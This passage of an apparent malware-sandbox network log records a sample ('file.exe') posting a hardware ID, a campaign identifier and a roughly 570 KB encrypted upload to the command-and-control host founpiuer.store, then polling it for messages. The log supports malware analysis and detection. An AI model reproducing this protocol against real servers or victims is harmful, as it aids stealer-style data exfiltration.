                                                                                                                                                                                                                            2024-11-06 13:39:06 UTC1256OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 33 46 30 33 31 46 33 35 37 38 39 39 31 30 35 35 39 44 34 42 36 33 42 39 33 42 45 33 43 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E23F031F35789910559D4B63B93BE3C2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                                                                                                                                            2024-11-06 13:39:08 UTC1013INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:08 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=j83k99s4eii4ij004sfeu9a3h1; expires=Sun, 02-Mar-2025 07:25:46 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZvD0rzwiOL8u7Lz9qYVS5wQSqZ6OVXyPPfJhdqbRLrGVJ70e4%2BiB1l24unpomvSaJshM5PScSulqO6B8yZqwRkMUQFLUio9Y96jzBIm%2FuMVFfC%2Ba8teaZCCQvAZzhV%2FYCtk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 8de57ce0be424644-DFW
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1198&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2261&delivery_rate=2403319&cwnd=244&unsent_bytes=0&cid=0ed69749650276f9&ts=1310&x=0"
                                                                                                                                                                                                                            2024-11-06 13:39:08 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 0d 0a
                                                                                                                                                                                                                            Data Ascii: 11ok 173.254.250.80
                                                                                                                                                                                                                            2024-11-06 13:39:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            6192.168.2.549710104.21.5.1554435508C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:09 UTC371OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                            Cookie: __cf_mw_byp=c77U7F.gPJAmjz5RNTSkMPHI.8x_tiIP5OX3.2Px_Jw-1730900338-0.0.1.1-/api
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                            Content-Length: 570270
                                                                                                                                                                                                                            Host: founpiuer.store
                                                                                                                                                                                                                            2024-11-06 13:39:09 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 33 46 30 33 31 46 33 35 37 38 39 39 31 30 35 35 39 44 34 42 36 33 42 39 33 42 45 33 43 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E23F031F35789910559D4B63B93BE3C2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                                                                                                                                            2024-11-06 13:39:09 UTC15331OUTData Raw: 5d 22 e2 e0 de 2e 5c 81 df 8e 08 dd 45 9b 40 ac 0b e3 e5 d3 35 40 c8 ac 1e 20 9c 2e bc a4 db 33 7e aa 04 7b 73 f5 69 e0 b4 44 57 a5 c4 e2 e7 f1 2a e9 e1 1f fa 64 79 06 7e 20 9b 97 f9 36 05 e7 bf b5 9f d4 f8 32 dd 32 8c b5 c4 4a 59 7c 4a 45 e8 27 bb 9f 4e 52 e7 69 78 f1 cd 19 2d c7 c8 68 e1 03 69 21 2a d4 a7 0b b5 6c ba b1 18 4f 84 90 fc 50 97 75 9b ee 85 14 f6 c3 fc c2 33 df 27 ce 4d 54 3b 20 eb 8b ce 9a c5 ee f5 59 1f f5 62 b5 0b 78 99 18 37 22 44 ed 07 4c d2 b1 37 0d ed 14 e5 37 c6 1d 32 6b 25 c4 66 55 48 f3 9d b5 8f f1 e2 9c cd ba 7b 2d 92 2b 3b 1f 16 91 73 bc e1 a8 0b f8 4b aa a0 b6 d6 14 55 c2 c5 17 08 5f 4f d9 ec 78 e0 82 04 66 48 8a 26 de 0b 86 9c cd 40 09 a5 0a 82 7d b9 c3 a2 43 54 e6 da 73 43 90 ac ba 98 af 86 88 b9 44 b5 2f f6 b8 73 db 33 f0 23
                                                                                                                                                                                                                            Data Ascii: ]".\E@5@ .3~{siDW*dy~ 622JY|JE'NRix-hi!*lOPu3'MT; Ybx7"DL772k%fUH{-+;sKU_OxfH&@}CTsCD/s3#
                                                                                                                                                                                                                            2024-11-06 13:39:09 UTC15331OUTData Raw: 7b ec 2b 9d bb 09 94 4c ac b2 cd e8 e2 f2 e2 f4 94 5c f8 81 a0 91 2e 11 1c 60 07 9c a3 3d 1b 92 ea 25 d3 6a 8e f1 9a e8 ec 04 2f 75 32 59 10 b5 6e 8b dc 85 63 09 e0 b1 57 9c e8 f0 07 9c 55 bf 5d de 11 ed ae 6a 86 56 07 9c f0 fb d1 41 a9 6e 12 a9 2e 0c 53 a2 65 e7 92 7e a1 32 30 16 8c 93 21 13 40 f3 ef e2 57 89 41 9c 40 e2 9e 43 0f d8 cf d0 7d 82 04 0f c9 5f 9b eb 5c df b5 75 7b 28 e2 2e e8 35 23 1b 34 1f cd ea b9 5f cb 1b 29 b2 15 cf 93 f9 52 95 b3 bc 66 eb de b3 ea 64 8d 9a fd 88 40 d8 a3 43 2e d0 8c ce e5 3b db 5c c2 f7 d9 63 45 1f b0 9c ef 17 ea fd 83 a0 25 ce be dd 38 a5 c6 60 74 ab 55 d8 65 5e 77 0c bb a6 9e b0 68 05 91 9f 79 18 26 ed 23 48 6f 7d 24 58 e5 ff ac a0 15 78 b9 f1 7f f7 be 71 a5 7e 96 37 66 e5 c7 e3 31 39 9a d6 99 35 7f a3 c3 af 69 b8 78
                                                                                                                                                                                                                            Data Ascii: {+L\.`=%j/u2YncWU]jVAn.Se~20!@WA@C}_\u{(.5#4_)Rfd@C.;\cE%8`tUe^why&#Ho}$Xxq~7f195ix
                                                                                                                                                                                                                            2024-11-06 13:39:09 UTC15331OUTData Raw: 37 4e b6 3e 8f 79 6c 62 b3 fe df 96 9f de f0 dd a4 e7 f6 bf 69 1b b9 ae 11 bf 4f 3f ce 37 1e ce b1 8a e9 f6 5a 7a f5 05 8e 48 f3 9e ee 95 ec 06 96 ec c4 b0 48 bb 35 4c 3f b1 7c 6d 3e cd 98 f6 8d 7b c1 70 20 7d 66 5e bd 66 55 b0 60 0b bf b6 4c fa 45 f3 fe 13 d9 6a 5b d3 a8 ee 51 32 12 37 b3 2e 26 1b 54 f2 3b 49 70 3c b8 68 3d 2b e6 bc 2f bb ca 53 71 2b bd dd 14 7c ad ce ef 36 e7 5e e0 34 a7 6e 5d 0c 16 dd 8a 25 ad f7 f4 18 65 9e 1c 88 21 93 87 52 9c d3 0c 03 6b 4f 29 bd 90 9f 73 11 25 2a c9 dd 13 5d 59 70 af 29 89 fc 4d 7b 5c 5a 88 c7 9c 65 9a 9c 7f 25 4c 05 a7 a0 2b 61 87 3d 25 3a 69 47 52 35 40 0a f5 6d 1d 6d b1 28 e6 52 1c eb 7b ff 9b 0b 51 52 36 15 89 2f 49 e7 db 0f 7a 3f c6 ae 86 78 19 2b 5d e6 76 dc 98 5c 5f b6 3a fc f7 5e e7 48 bd 86 df 9f db 5b 5c
                                                                                                                                                                                                                            Data Ascii: 7N>ylbiO?7ZzHH5L?|m>{p }f^fU`LEj[Q27.&T;Ip<h=+/Sq+|6^4n]%e!RkO)s%*]Yp)M{\Ze%L+a=%:iGR5@mm(R{QR6/Iz?x+]v\_:^H[\
                                                                                                                                                                                                                            2024-11-06 13:39:09 UTC15331OUTData Raw: 14 5c 2a 45 06 35 1e 3c 18 23 4f 16 60 2f f5 93 8c 47 9b f1 57 78 b6 00 45 b9 4b b2 57 6b ad 59 26 dc 8e 57 0e 94 c0 4a d9 7a 12 fb 1b 7c a7 e8 1e 3f 4e 10 3c 97 77 b7 a9 00 bf a3 4a 29 3f 93 eb cc ca 50 1e 4a 68 08 a7 40 ee 85 e5 2f 03 68 11 a7 cb 12 07 bf f9 9b 7e 8b 36 84 fb 3b e1 d6 a4 b9 c8 4a 0b 31 f4 40 98 1f 74 c7 59 a5 4e 00 b2 00 76 2a 54 dd 91 77 25 2c 87 09 17 d7 0a 01 98 45 09 e7 23 66 d7 61 2b 3b 85 c8 87 7c be 89 76 5a 08 96 39 b0 53 72 76 5f cb 4c 5f 76 cb a9 0e 18 77 be 74 c2 e1 62 f8 85 ac 47 3b 0b 85 7f c2 3f 92 ed ba 16 85 9f de 8d 52 fe 2a b5 70 41 8f 28 83 b9 1a e5 d0 b5 b2 ee eb ad dd 36 77 bc dc ca 3e b3 15 7c 55 1c fa f5 5b 34 56 1b d2 31 35 de 7e ec 0e c2 0b 7f df d4 3f 8b 99 9d 12 05 1f 7f c4 2b ab 02 3f 6e 68 b4 eb b7 34 05 eb
                                                                                                                                                                                                                            Data Ascii: \*E5<#O`/GWxEKWkY&WJz|?N<wJ)?PJh@/h~6;J1@tYNv*Tw%,E#fa+;|vZ9Srv_L_vwtbG;?R*pA(6w>|U[4V15~?+?nh4
                                                                                                                                                                                                                            2024-11-06 13:39:09 UTC15331OUTData Raw: 50 59 57 fa 61 7f a1 51 8b 68 68 63 7c bd e1 41 09 98 4f 85 19 07 15 16 26 54 a9 7d ad ba 7e d5 b8 a8 04 ac e7 29 a9 55 c2 b8 99 f0 40 0f 6e 76 f5 ce d6 40 ca 90 18 3b 85 7a 94 b0 00 ff 0f 8b c3 29 94 31 6c 4f 85 c6 dc 0c c7 18 a5 df 32 81 40 fe 49 fc 88 f3 66 e8 ea c5 8b 9b 48 34 40 d6 28 2d 34 f3 12 fa b9 9f f4 5b 8b 70 25 de b4 74 7b 77 cb 86 db b4 ed 17 f3 be 10 53 f4 b0 d4 06 b6 fb 64 32 12 a1 3b c0 41 12 16 94 c9 11 b7 f8 e2 87 91 b4 22 09 73 dd 4f 11 6b 42 11 87 5a 88 a5 85 e6 a9 ae 09 5d 95 eb 9f be 57 6b 5e 22 bc 28 21 21 9a e0 08 75 a1 27 f2 87 53 33 8a 0c cc d3 6d 7d 2e 8e cd 08 17 46 ff 54 a5 60 0a 04 ca 80 d6 42 7c 9e 86 6c e4 fb 3b 8f 8a 3e c5 9a 2f 22 71 d9 d9 9d 4a 99 4a 35 89 c1 8d b7 a4 65 af 9b a8 60 43 91 04 05 dd e6 d4 21 e5 a3 46 5a
                                                                                                                                                                                                                            Data Ascii: PYWaQhhc|AO&T}~)U@nv@;z)1lO2@IfH4@(-4[p%t{wSd2;A"sOkBZ]Wk^"(!!u'S3m}.FT`B|l;>/"qJJ5e`C!FZ
                                                                                                                                                                                                                            2024-11-06 13:39:09 UTC15331OUTData Raw: 26 02 e8 45 65 46 d6 2e 8d 2c 27 05 bc e0 37 54 a9 16 38 88 f4 10 86 f0 38 81 3a b4 21 9d 71 e3 80 d6 46 ab fe fa c2 6d a3 cf 17 37 06 3f b4 90 46 56 01 57 66 ec e3 86 e4 36 b8 f8 fa 99 2f 1f 9b a4 e9 d7 67 33 b0 b0 0c 3f d1 22 ee 74 96 08 59 7b 4d 1b cc 08 22 3f ec a7 be 2d e6 0a a8 98 d4 70 55 e0 5b ac c1 17 e2 03 21 5a db 50 45 c1 70 6f 4c 62 02 7e 2a 81 aa 28 6c 9c 53 cd 6f d7 4f 27 2c 5c 29 51 9f e5 e7 2b db 4c 19 a8 4b 7f ba 98 12 66 9e 16 63 17 c8 98 4f 08 90 b6 55 54 61 d8 99 0b c7 3d 8c 60 9d 75 87 ea e7 73 db 9d 51 7a bd b3 9e 02 a6 78 81 99 e0 49 c1 2b 2f da 5d cc 0c 1d e7 bf 9a 91 91 b8 6d e2 83 69 0b d7 f3 99 46 f2 73 a5 9a a3 23 9d 07 5b d6 9a ae 0f e8 53 3b 6e 79 f0 39 8f a5 86 a6 ce e0 74 32 f5 81 f9 22 74 0f cf ba 9c 3b 2f 7a 46 bf a2 8b
                                                                                                                                                                                                                            Data Ascii: &EeF.,'7T88:!qFm7?FVWf6/g3?"tY{M"?-pU[!ZPEpoLb~*(lSoO',\)Q+LKfcOUTa=`usQzxI+/]miFs#[S;ny9t2"t;/zF
                                                                                                                                                                                                                            2024-11-06 13:39:09 UTC15331OUTData Raw: d7 88 40 30 9e 49 d2 8e 8b 09 91 3a 1f 0f 71 9d 77 5b a0 33 60 14 12 04 03 5f 76 f2 61 e8 4b 47 64 30 a2 cb a9 fe ee 25 63 99 6b 70 bf e3 da 2a 1f 2a 15 26 79 95 f2 77 af 4f 84 6f c2 36 85 17 ec a1 9c 46 2d 8a c5 e3 4f f9 98 34 d0 13 6b 5e bb a5 2e f1 42 42 e4 8b 46 c1 db 14 cb 41 fa 6b 92 dd 43 58 5c 26 32 e3 c9 4a 3e b0 77 8d ad 22 ee 41 82 ef 0d d6 f9 ee 9d 63 ed f8 32 c3 ed 77 6c 78 f7 80 01 65 fb 5c 5a 96 79 47 83 ba d4 29 9b 7c fb 6e 1a f2 1d c1 6e 38 62 f3 1c 32 5a ee 50 d5 12 df a4 43 a8 0d a9 63 80 52 ed 2e db b7 9a da ca 29 2f 5c d1 65 cd 6d b7 15 eb d7 fe ef e2 89 e0 93 3a 0f 60 0a 88 c9 3a e5 90 fd bf 1b 97 5d 94 64 b3 34 ba cf 1c 14 c6 c4 3f 8e 73 f8 0d 3e 30 b8 5f b3 74 f0 d6 8c 8b 03 4b 2f c0 5c a7 0a b5 57 d9 2b 77 2c 71 ad 7b cb d9 d4 ce
                                                                                                                                                                                                                            Data Ascii: @0I:qw[3`_vaKGd0%ckp**&ywOo6F-O4k^.BBFAkCX\&2J>w"Ac2wlxe\ZyG)|nn8b2ZPCcR.)/\em:`:]d4?s>0_tK/\W+w,q{
                                                                                                                                                                                                                            2024-11-06 13:39:09 UTC15331OUTData Raw: ea 0a dd 51 0c 4d e0 39 4d d6 cb ed 87 31 78 00 6d d3 39 71 82 69 65 98 69 3d d8 09 b4 f7 34 f4 65 2b ff 4d 53 7c f4 0f 03 99 ee a6 0c fe 14 33 35 18 01 d6 80 ef 16 5d ac 19 e2 2f d8 ab 9c b9 c3 b3 bd 11 09 3c a7 5b 56 d8 76 58 f4 32 4e 89 2f 25 54 fb 2f aa 75 b5 35 26 49 85 a2 b4 59 a6 91 11 51 de 16 e5 2b fc 43 36 36 52 74 f4 af be 9c d8 8f 3d a6 f5 4b ae 48 af ec b6 08 03 6b 7b 45 f2 c9 eb d4 ff c5 8a ce b1 27 94 60 d4 50 2d 54 b4 dc ce cb 35 3b 8f 6c 29 4a 81 1a 26 80 ed bc de 1c 46 4e 06 01 ae 5e d0 ac db 23 0a 86 d9 3b 9c 18 c0 83 21 90 77 16 e5 f1 f1 e5 47 b0 f5 e3 10 95 be de da 9d 56 07 f8 b9 d7 b2 77 5c 33 97 f2 29 76 83 14 07 8d e6 f3 7b 2c 18 ee 49 5b 53 48 5c 32 a7 65 eb fd 2e 53 a3 90 c9 97 57 36 4f 15 ae a6 2a eb 18 d9 2b e3 96 06 79 e6 85
                                                                                                                                                                                                                            Data Ascii: QM9M1xm9qiei=4e+MS|35]/<[VvX2N/%T/u5&IYQ+C66Rt=KHk{E'`P-T5;l)J&FN^#;!wGVw\3)v{,I[SH\2e.SW6O*+y
                                                                                                                                                                                                                            2024-11-06 13:39:09 UTC15331OUTData Raw: f1 28 9c f9 97 53 11 4a 5d 96 52 20 69 de 79 27 07 ba fe 5c b8 91 31 27 87 3a 38 d4 73 66 07 3f c8 b4 bb ff dd 1b 05 e7 3a d1 bf 6a 2d bf 93 01 be 7c 08 cd d8 e3 b1 89 8c 2e be ad 6a 6e f3 61 a9 8f f4 75 3b 29 75 b4 22 b6 29 29 c4 9a 0b 35 f4 b3 c1 d4 38 fd 7b b9 fb f5 1f 5d 74 be 9c cb 45 0a 48 38 a1 46 b6 e4 e0 43 de fa d2 10 32 a6 6a fe 83 78 be 57 27 af fa 9a cd f8 f7 c6 f1 f5 67 d9 76 74 cc a4 44 27 b7 de 2c 02 3c 42 23 8a 90 f0 00 c2 98 17 64 4a a1 ba ea b0 d0 1b 37 b2 30 44 ca be 4e 7e d1 90 e6 78 a0 cc 2e 7a f5 0f d6 d5 81 d7 86 b4 17 c4 1f 78 88 b2 c3 f5 1c 66 c7 0d bd 41 81 3b 03 08 aa 08 50 7e 88 b1 eb 4e 45 98 22 88 83 d2 5f f5 91 a0 13 ba 0e e1 1b 8e da ca 19 83 ac cf 40 05 ec 5a b3 28 83 d0 40 98 a7 99 58 1d 6d 1a 12 b5 ad 71 78 b4 1b 20 3c
                                                                                                                                                                                                                            Data Ascii: (SJ]R iy'\1':8sf?:j-|.jnau;)u"))58{]tEH8FC2jxW'gvtD',<B#dJ70DN~x.zxfA;P~NE"_@Z(@Xmqx <
                                                                                                                                                                                                                            2024-11-06 13:39:14 UTC1019INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:14 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=qtncbmjbo60vipmlmp3i3ur5ao; expires=Sun, 02-Mar-2025 07:25:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KgnjeyHCAgSA247JtvD4c%2F00HMxwbBixdoGfe%2BtaTq7CsGXlJUT6oCnHoRiB9QbzERvGz7ef0rwmi%2F6U3qD0fcNtAqwOjRybkvBB1%2Fy6gXk5uSjbOyXblPzeCoOeYrhiU5w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 8de57cf23d50eb02-DFW
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1296&sent=212&recv=606&lost=0&retrans=0&sent_bytes=2838&recv_bytes=572905&delivery_rate=2219157&cwnd=238&unsent_bytes=0&cid=0da6bec34fe8dfc9&ts=4683&x=0"


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            7192.168.2.549714104.21.5.1554435508C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:15 UTC352OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                            Cookie: __cf_mw_byp=c77U7F.gPJAmjz5RNTSkMPHI.8x_tiIP5OX3.2Px_Jw-1730900338-0.0.1.1-/api
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                            Content-Length: 87
                                                                                                                                                                                                                            Host: founpiuer.store
                                                                                                                                                                                                                            2024-11-06 13:39:15 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d 26 68 77 69 64 3d 45 32 33 46 30 33 31 46 33 35 37 38 39 39 31 30 35 35 39 44 34 42 36 33 42 39 33 42 45 33 43 32
                                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=4SD0y4--legendaryy&j=&hwid=E23F031F35789910559D4B63B93BE3C2
                                                                                                                                                                                                                            2024-11-06 13:39:16 UTC1007INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:16 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=761ovps60lmsl724ba06kbr8kd; expires=Sun, 02-Mar-2025 07:25:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cgk1gXNoXZ8YTq1RNWqHamcWPgbJprKPSiUWhSRVVxHK4pIzlvlnrxfKxTxLuG1rs8EN7S0ebkB2%2B9CmSgZRTtpf0xKOW9jTfdBfSmretsVoRouZGkJcuRwlyN6ArYkvLIs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 8de57d131935eadd-DFW
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1223&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1075&delivery_rate=2373770&cwnd=251&unsent_bytes=0&cid=23c6d3d77f125ba4&ts=1419&x=0"
                                                                                                                                                                                                                            2024-11-06 13:39:16 UTC214INData Raw: 64 30 0d 0a 64 32 76 36 43 38 33 71 4f 37 6e 2b 49 4a 68 70 64 39 31 4a 55 4d 6b 79 41 44 4b 4f 74 65 46 6b 44 56 42 75 54 34 44 77 33 53 30 73 45 4e 68 2b 37 39 41 5a 30 59 70 55 36 46 4d 72 38 68 56 2f 2b 41 6f 31 48 4c 79 45 31 45 6f 38 59 56 31 68 73 63 61 42 41 67 51 66 6e 32 71 67 74 68 54 4c 6e 30 37 38 42 68 72 7a 4c 43 69 73 45 43 77 51 36 4d 48 44 58 6a 31 38 54 43 71 69 79 75 78 51 57 78 44 59 66 75 2f 51 47 64 47 4b 56 4f 68 54 4b 2f 49 56 66 2f 67 4b 4e 52 79 38 68 4e 52 4b 50 47 46 64 59 62 48 47 67 51 49 59 44 5a 78 58 34 6f 35 65 33 39 42 46 34 41 78 56 38 57 73 32 76 52 41 36 41 71 4b 58 68 45 59 33 59 52 4d 53 0d 0a
                                                                                                                                                                                                                            Data Ascii: d0d2v6C83qO7n+IJhpd91JUMkyADKOteFkDVBuT4Dw3S0sENh+79AZ0YpU6FMr8hV/+Ao1HLyE1Eo8YV1hscaBAgQfn2qgthTLn078BhrzLCisECwQ6MHDXj18TCqiyuxQWxDYfu/QGdGKVOhTK/IVf/gKNRy8hNRKPGFdYbHGgQIYDZxX4o5e39BF4AxV8Ws2vRA6AqKXhEY3YRMS
                                                                                                                                                                                                                            2024-11-06 13:39:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            8192.168.2.5497114.175.87.197443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:15 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XPVFHs15PCyFd6Z&MD=YnMZZMZu HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                                                                                                            2024-11-06 13:39:15 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                            MS-CorrelationId: 89e8e557-0c41-420f-99ca-f8bdf6574c00
                                                                                                                                                                                                                            MS-RequestId: e42b0aa6-d64e-45da-be39-0b4ad8081add
                                                                                                                                                                                                                            MS-CV: CC/kYwzs4kyEmSPD.0
                                                                                                                                                                                                                            X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:14 GMT
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Content-Length: 24490
